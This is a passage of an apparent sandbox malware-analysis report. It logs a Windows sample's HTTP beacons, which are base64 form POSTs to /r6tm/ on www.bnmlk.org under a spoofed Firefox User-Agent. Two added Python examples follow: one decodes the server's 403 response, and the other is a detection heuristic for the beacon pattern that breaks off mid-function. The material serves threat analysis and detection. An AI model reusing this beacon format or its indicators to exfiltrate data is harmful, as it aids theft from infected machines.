                                                    Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.5 | 57208 | 13.248.151.237 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:03.960134983 CEST | 693 | OUT | POST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 58 43 4a 48 41 52 64 36 2b 4c 35 49 77 65 47 64 56 78 69 4c 75 6f 70 33 76 58 74 37 74 56 73 7a 4e 2b 63 2f 4d 79 52 30 43 6f 57 44 67 58 78 62 78 6a 55 45 72 35 41 41 50 74 74 6f 75 50 50 4c 75 58 68 73 41 62 35 6e 48 79 62 66 48 48 44 72 6c 37 62 47 42 77 6b 72 43 55 74 68 54 2f 61 6a 31 48 67 61 39 32 65 2b 53 4a 35 50 75 72 57 72 37 2f 48 4b 53 61 6b 48 45 53 53 6e 32 43 61 32 77 39 79 66 4a 53 79 4f 61 6a 69 6f 65 61 6c 63 35 56 48 4c 76 43 72 73 77 61 37 47 2f 56 57 68 35 41 35 63 50 6d 4d 73 54 78 34 4c 6f 37 2f 33 32 71 73 41 72 39 33 7a 74 42 63 3d
                                                    Data Ascii: V6h=51DU5kSYZLLtXCJHARd6+L5IweGdVxiLuop3vXt7tVszN+c/MyR0CoWDgXxbxjUEr5AAPttouPPLuXhsAb5nHybfHHDrl7bGBwkrCUthT/aj1Hga92e+SJ5PurWr7/HKSakHESSn2Ca2w9yfJSyOajioealc5VHLvCrswa7G/VWh5A5cPmMsTx4Lo7/32qsAr93ztBc=
                                                    Sep 5, 2024 14:26:04.414572954 CEST | 315 | IN | HTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:04 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
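
The 403 responses in sessions 17 to 19 carry a chunked, gzip-compressed body, which is why the report's Data Ascii rendering above shows only punctuation. The following is an added example and not part of the Joe Sandbox report: it takes the Data Raw bytes of the session 17 response exactly as printed above, strips the HTTP/1.1 chunk framing and gunzips the result so the analyst can read what www.bnmlk.org actually returned. The gzip trailer visible in the hex (92 00 00 00) already gives the decompressed length as 146 bytes; the function names and the generic de-chunking logic are ours.

```python
"""Decode the gzip-compressed, chunked 403 body returned to the sample.

Added example, not part of the Joe Sandbox report. RAW_403_BODY_HEX is the
report's own "Data Raw" line for the session 17 response; the de-chunking and
gunzip steps are generic HTTP/1.1, and the function names are ours.
"""
import zlib

# Transcribed from the report (session 17, HTTP/1.1 403 Forbidden). Layout:
# "6b\r\n" chunk-size line, 0x6b = 107 bytes of gzip data, "\r\n", then the
# terminating "0\r\n\r\n". The gzip trailer ends 92 00 00 00 = ISIZE 146.
RAW_403_BODY_HEX = (
    "36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 "
    "4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 "
    "87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 "
    "eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 "
    "2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump (the report's 'Data Raw' format) into bytes."""
    return bytes.fromhex("".join(dump.split()))


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (RFC 9112 section 7.1).

    Each chunk is '<hex size>[;ext]\\r\\n<data>\\r\\n'; a zero-size chunk ends the
    body. A malformed or truncated stream raises ValueError rather than
    returning a partial body, so a damaged capture is not silently mis-decoded.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("chunk size line not terminated")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)  # trailer section, if any, is not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def decode_response_body(raw: bytes, chunked: bool = True, gzipped: bool = True) -> bytes:
    """Undo Transfer-Encoding first, then Content-Encoding, as a client would."""
    data = dechunk(raw) if chunked else raw
    if gzipped:
        # wbits=31 selects gzip framing and makes zlib verify the CRC32/ISIZE trailer.
        data = zlib.decompress(data, wbits=31)
    return data


def decode_report_403() -> bytes:
    """The session 17 response body, de-chunked and gunzipped."""
    return decode_response_body(hex_dump_to_bytes(RAW_403_BODY_HEX))


if __name__ == "__main__":
    page = decode_report_403()
    print(f"{len(page)} bytes after de-chunk + gunzip:")
    print(page.decode("utf-8", errors="replace"))
```

With wbits=31, zlib checks the gzip CRC32 and ISIZE trailer, so a mis-copied byte raises zlib.error instead of producing a plausible but wrong page. The identical 315-byte response came back in sessions 18 and 19, so one decode covers all three; the 200 response in session 20 is chunked (its first chunk size is 1d22) but has no Content-Encoding header, so for it only dechunk() applies.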


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.5 | 57209 | 13.248.151.237 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:06.500579119 CEST | 713 | OUT | POST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 47 53 5a 48 43 32 4a 36 76 37 35 4c 75 4f 47 64 66 52 69 78 75 6f 31 33 76 53 64 56 74 6d 49 7a 4e 65 4d 2f 4e 77 70 30 4c 34 57 44 71 33 78 65 2f 44 55 78 72 35 63 69 50 74 68 6f 75 4a 6a 4c 75 54 70 73 41 4d 74 6d 48 69 62 64 65 33 44 74 6d 4c 62 47 42 77 6b 72 43 55 35 62 54 37 2b 6a 31 33 51 61 38 58 65 2f 59 70 35 4d 72 62 57 72 2f 2f 48 4f 53 61 6c 69 45 54 4f 4e 32 48 65 32 77 34 4f 66 49 41 4b 4e 4a 44 69 75 61 61 6b 44 78 41 69 59 6f 41 2f 4e 79 4d 6d 41 2f 7a 43 66 34 32 55 32 56 45 45 45 41 52 55 7a 34 6f 33 41 6e 61 4e 70 78 65 6e 44 7a 57 4c 46 7a 6d 70 79 2f 71 68 4a 64 53 30 38 71 30 52 6d 36 57 76 36
                                                    Data Ascii: V6h=51DU5kSYZLLtGSZHC2J6v75LuOGdfRixuo13vSdVtmIzNeM/Nwp0L4WDq3xe/DUxr5ciPthouJjLuTpsAMtmHibde3DtmLbGBwkrCU5bT7+j13Qa8Xe/Yp5MrbWr//HOSaliETON2He2w4OfIAKNJDiuaakDxAiYoA/NyMmA/zCf42U2VEEEARUz4o3AnaNpxenDzWLFzmpy/qhJdS08q0Rm6Wv6
                                                    Sep 5, 2024 14:26:06.979032993 CEST | 315 | IN | HTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.5 | 57210 | 13.248.151.237 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:09.041007996 CEST | 1730 | OUT | POST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 47 53 5a 48 43 32 4a 36 76 37 35 4c 75 4f 47 64 66 52 69 78 75 6f 31 33 76 53 64 56 74 6d 41 7a 4d 6f 41 2f 4d 58 39 30 5a 6f 57 44 30 6e 78 66 2f 44 55 6f 72 35 45 6d 50 74 39 57 75 4d 2f 4c 76 78 78 73 58 4e 74 6d 4e 69 62 64 57 58 44 73 6c 37 62 58 42 78 49 76 43 55 70 62 54 37 2b 6a 31 78 30 61 38 47 65 2f 65 70 35 50 75 72 57 5a 37 2f 48 6d 53 63 4d 66 45 54 4b 33 32 7a 71 32 77 5a 2b 66 4b 31 6d 4e 54 44 69 73 64 61 6b 4c 78 41 6e 41 6f 41 7a 2f 79 4d 36 6d 2f 30 32 66 30 43 56 2f 4d 47 34 53 53 42 34 77 79 71 2f 69 2b 4e 4a 70 35 63 76 76 78 6e 7a 2f 77 45 4e 72 79 2b 4d 4c 58 57 39 44 32 77 6c 46 34 57 54 32 6e 36 4d 62 76 76 31 56 75 62 32 51 30 47 4d 73 79 61 31 48 52 6a 62 4a 2b 6d 52 45 51 77 66 56 50 31 50 43 45 43 49 6a 52 70 36 4e 4b 6b 68 66 4d 76 71 71 6c 77 63 58 5a 59 43 4e 51 4b 6e 4a 48 47 52 76 2b 48 52 63 6f 47 6a 75 52 36 72 5a 38 7a 35 32 6b 54 59 4e 38 54 43 53 72 5a 61 66 4b 78 65 42 35 46 71 47 35 51 7a 62 70 56 49 63 77 32 [TRUNCATED]
                                                    Data Ascii: V6h=51DU5kSYZLLtGSZHC2J6v75LuOGdfRixuo13vSdVtmAzMoA/MX90ZoWD0nxf/DUor5EmPt9WuM/LvxxsXNtmNibdWXDsl7bXBxIvCUpbT7+j1x0a8Ge/ep5PurWZ7/HmScMfETK32zq2wZ+fK1mNTDisdakLxAnAoAz/yM6m/02f0CV/MG4SSB4wyq/i+NJp5cvvxnz/wENry+MLXW9D2wlF4WT2n6Mbvv1Vub2Q0GMsya1HRjbJ+mREQwfVP1PCECIjRp6NKkhfMvqqlwcXZYCNQKnJHGRv+HRcoGjuR6rZ8z52kTYN8TCSrZafKxeB5FqG5QzbpVIcw2w9v+FYidoWWvnVRk7LlWwy3gjK6vs9RkySXftaJaQxcupLr7oG54c997ljJaEq92xFhdApWl7sfpp5aGBNQKL5lRw1feJaoqbLWSk+LeWf6E/LVbJrnYfe3XTq9/oPRPMaRejRj0LUSA3OLZuokGeIq3LeA2uYFRt3M82H2nt/Bv/PdaEmS7BiE+IjusDf14fugYDe377h8cFwEElh2OVCUIlrR1YWFEM+TYfHT+bqgYaRhnUTpelRDY9dtatpxrOuj3bdiWKQ4zczgFsTNqGj6cpsE1IAF7Hv/v3pfy2wMONyqHl06hLzJfJcshV7SZeX4FPB1fWHsxJe/qIOBSePRmQwS/EGTF+BAWSwbaA8OKxw8M/Kp0+POTxndnU2t/FYsSdPJozuHLnQdj961ICUbfdq1c0GmauFU2YZnGmDrM4UlfGNp+29SnJjpayDZWwxWb/zYYQ4sdgB1MSvkAWWuTB+L0mJinFiGqVgfvCUkf0PiicU3V2tXOt78y8SI8prYuj7efwEwUrylexW09a3j7kto4uDumhg0TCNGAQuS0ZXzpqg+qfyeMwa+rHjwIPeOXmPyf/Sj+S4ni0BOb/wCPYbQxW8fjgij5TXend9WfwYeoNcBXE9VoGapB3aqhRVv8qrDFYssNGPQrLtlqIDMBTsiPW7iJ0B [TRUNCATED]
                                                    Sep 5, 2024 14:26:09.498462915 CEST | 315 | IN | HTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.5 | 57211 | 13.248.151.237 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:11.571048975 CEST | 444 | OUT | GET /r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:12.167295933 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Thu, 05 Sep 2024 12:26:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SGpfTtKeSXeYdcrzNxA+gYzI0inhX9kF4uUYiJQv39X7wG0F2ND2OiuAtPNWhjsUqFIl4vUlFCk2LpROl0Nt7g==
                                                    Accept-CH: viewport-width
                                                    Accept-CH: dpr
                                                    Accept-CH: device-memory
                                                    Accept-CH: rtt
                                                    Accept-CH: downlink
                                                    Accept-CH: ect
                                                    Accept-CH: ua
                                                    Accept-CH: ua-full-version
                                                    Accept-CH: ua-platform
                                                    Accept-CH: ua-platform-version
                                                    Accept-CH: ua-arch
                                                    Accept-CH: ua-model
                                                    Accept-CH: ua-mobile
                                                    Accept-CH-Lifetime: 30
                                                    X-Domain: bnmlk.org
                                                    X-Subdomain: www
                                                    Data Raw: 31 64 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 53 47 70 66 54 74 4b 65 53 58 65 59 64 63 72 7a 4e 78 41 2b 67 59 7a 49 30 69 6e 68 58 39 6b 46 34 75 55 59 69 4a 51 76 33 39 58 37 77 47 30 46 32 4e 44 32 4f 69 75 41 74 50 4e 57 68 6a 73 55 71 46 49 6c 34 76 55 6c 46 43 6b 32 4c 70 52 4f 6c 30 4e 74 37 67 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                    Data Ascii: 1d22<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SGpfTtKeSXeYdcrzNxA+gYzI0inhX9kF4uUYiJQv39X7wG0F2ND2OiuAtPNWhjsUqFIl4vUlFCk2LpROl0Nt7g==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, init
                                                    Sep 5, 2024 14:26:12.167320967 CEST | 1236 | IN | Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 62 6e 6d 6c 6b 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63
                                                    Data Ascii: ial-scale=1, shrink-to-fit=no"/> <title>bnmlk.org</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline
                                                    Sep 5, 2024 14:26:12.167332888 CEST | 448 | IN | Data Raw: 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 20 20 20 20 66 6f 6e
                                                    Data Ascii: { padding:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp
                                                    Sep 5, 2024 14:26:12.167351007 CEST | 1236 | IN | Data Raw: 6d 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 34 30 70 78 3b 0a 7d 0a 0a 2e 77 72 61 70 70 65 72 33 20 7b 0a 20 20 20 20 62 61 63 6b
                                                    Data Ascii: m.png') no-repeat center bottom; padding-bottom:140px;}.wrapper3 { background:#fff; max-width:300px; margin:0 auto 1rem; padding-top:1px; padding-bottom:1px;}.onDesktop { display:none;}.tcHolder { paddi
                                                    Sep 5, 2024 14:26:12.167363882 CEST | 1236 | IN | Data Raw: 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 66 61 6c 6c 62 61 63 6b 2d 74 65 72 6d 2d 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e
                                                    Data Ascii: }}</style> <style media="screen">.fallback-term-holder { display: inline-grid; grid-template-columns: 1fr; width: 100%; padding-top: 50px;}.fallback-term-link { grid-column: 1 / span 1; align-self: center;
                                                    Sep 5, 2024 14:26:12.167373896 CEST | 1236 | IN | Data Raw: 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61
                                                    Data Ascii: max-width: 980px; font-size: 80%; font-family: sans-serif; box-shadow: 0 1px 6px rgba(0,0,0,.2); max-height: 65px; display: flex; align-items: center; overflow: hidden; text-align: right; } .reg-logo {
                                                    Sep 5, 2024 14:26:12.167386055 CEST | 1236 | IN | Data Raw: 78 20 30 3b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 39 36 25 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 7a 2d 69 6e 64 65 78 3a 20 32 30 3b 0a 09 7d 0a 0a 09 2e 73 61 6c 65 5f
                                                    Data Ascii: x 0;width: 900px;max-width:96%;margin: 0 auto;z-index: 20;}.sale_link_bold a {font-weight: bold;text-decoration: underline;color: rgb(0,0,0);font-size: 14px;}.sale_link_bold a:hover {color: rgb(100,100,100)
                                                    Sep 5, 2024 14:26:12.167398930 CEST | 387 | IN | Data Raw: 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 63 62 6c 6f 63 6b 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74
                                                    Data Ascii: age="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-He
                                                    Sep 5, 2024 14:26:12.167412043 CEST | 1236 | IN | Data Raw: 31 30 30 30 0d 0a 6f 6e 27 3a 20 27 23 61 61 61 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 54 69 74 6c 65 4c 69 6e 6b 27 3a 20 27 23 30 32 37 37 62 64 27 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 41 6c 70 68 61 62 65 74 69 63 61 6c 6c 79 0a
                                                    Data Ascii: 1000on': '#aaa', 'colorTitleLink': '#0277bd', // Alphabetically 'horizontalAlignment': 'center', 'noTitleUnderline': false, 'rolloverLinkColor': '#01579b', 'verticalSpacing': 10 }; var
                                                    Sep 5, 2024 14:26:12.167423010 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 6c 65 74 20 64 6f 6d 61 69 6e 3d 27 62 6e 6d 6c 6b 2e 6f 72 67 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 73 63 72 69 70 74 50 61 74 68 3d 27 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 61 64 74 65 73 74 3d 27 6f 66 66 27
                                                    Data Ascii: let domain='bnmlk.org'; let scriptPath=''; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') +
                                                    Sep 5, 2024 14:26:12.172365904 CEST | 1236 | IN | Data Raw: 63 6b 69 6e 67 49 44 29 2b 20 22 26 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 2b 20 22 26 64 61 74 61 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 4a
                                                    Data Ascii: ckingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;
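
Sessions 17 to 20 above show the request shape this sample repeats against each host it tries: a fixed Firefox 40 on Mac OS X User-Agent sent by a Windows executable under C:\Program Files (x86), a short directory-style path such as /r6tm/, a form body or query string whose short key (V6h, sH) carries a raw base64 blob, and, on the POSTs, Origin and Referer headers pointing back at the request's own host and path. The block below is an added example and not part of the Joe Sandbox report or of any vendor signature; it turns those observations into a small heuristic that can be run over raw HTTP requests pulled from a proxy log or a pcap. The two request strings embedded in it are transcribed from sessions 17 and 20 with the headers the heuristic does not read left out, the benign control request is constructed, and the indicator names, the path pattern and the threshold of three are our assumptions.

```python
"""Heuristic for the beacon shape in sessions 17-20 of this report.

Added example: not from the Joe Sandbox report and not a vendor signature.
Indicators are limited to what the requests above show; the path pattern,
indicator names and the threshold of three are our assumptions.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Exact User-Agent on every request in this report (a Windows process claiming
# to be Firefox 40 on a Mac).
OBSERVED_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) "
               "Gecko/20100101 Firefox/40.0")
# Assumed generalisation of the /r6tm/ and /ld3u/ paths seen above.
SHORT_DIR_PATH = re.compile(r"^/[a-z0-9]{2,8}/$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body).
    Header names are lower-cased; the body stays verbatim because urllib's
    parse_qs would turn the raw '+' in the sample's payload into a space."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_form(encoded):
    """Split 'k=v&k2=v2' on the first '=' of each pair, without percent-decoding."""
    pairs = []
    for field in encoded.split("&"):
        if field:
            key, _, value = field.partition("=")
            pairs.append((key, value))
    return pairs


def is_raw_base64_blob(value, min_len=40):
    """Long, correctly padded base64 sent unescaped. A browser form post would
    escape '+', '/' and '=' as %2B, %2F, %3D; the sample sends them raw."""
    if len(value) < min_len or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def beacon_indicators(raw_request):
    """Names of the indicators one raw request matches."""
    method, target, headers, body = parse_request(raw_request)
    url = urlsplit(target)
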